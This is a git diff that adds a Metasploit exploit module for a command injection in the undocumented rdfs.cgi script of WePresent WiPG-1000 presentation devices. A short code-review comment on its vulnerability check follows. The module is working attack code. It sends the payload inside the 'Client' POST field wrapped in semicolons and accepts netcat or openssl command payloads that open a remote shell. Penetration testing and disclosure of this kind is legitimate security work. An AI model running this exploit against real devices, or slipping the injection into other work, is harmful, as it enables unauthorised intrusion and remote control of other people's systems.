diff --git a/modules/exploits/linux/http/wipg1000_cmd_injection.rb b/modules/exploits/linux/http/wipg1000_cmd_injection.rb
new file mode 100644
index 0000000000..371c021377
--- /dev/null
+++ b/modules/exploits/linux/http/wipg1000_cmd_injection.rb
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'WePresent WiPG-1000 Command Injection',
+ 'Description' => %q{
+ This module exploits a command injection vulnerability in an undcoumented
+ CGI file in several versions of the WePresent WiPG-1000 devices.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Matthias Brun', # Vulnerability Discovery, Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
+ ],
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic netcat openssl'
+ }
+ },
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['WiPG-1000 <=2.0.0.7', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 20 2017',
+ 'DefaultTarget' => 0))
+ end
+
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri('/cgi-bin/rdfs.cgi')
+ })
+ if res and res.body =~ /Follow administrator instructions to enter the complete path/ then
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ print_status('Sending request')
+ execute_cmd(payload.encoded)
+ end
+
+ def execute_cmd(cmd)
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri('/cgi-bin/rdfs.cgi'),
+ 'vars_post' => {
+ 'Client' => ";#{cmd};",
+ 'Download' => 'Download'
+ }
+ )
+
+ return res
+ end
+end
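Review bot: In `check`, a nil response (timeout, connection refused, wrong port) falls into the `else` branch and is reported as `Exploit::CheckCode::Safe`, so an unreachable device is recorded as not vulnerable. Anyone using the check for exposure assessment gets a false negative; add `return Exploit::CheckCode::Unknown unless res` before the `if`. The body match only shows that the `rdfs.cgi` page is served, not which firmware is running, so `Exploit::CheckCode::Detected` is probably the more honest result than `Appears`, unless fixed firmware is known to remove the page. The condition would also read better as `if res && res.body =~ /.../` without the trailing `then`. The `Description` string has a typo, `undcoumented` for `undocumented`.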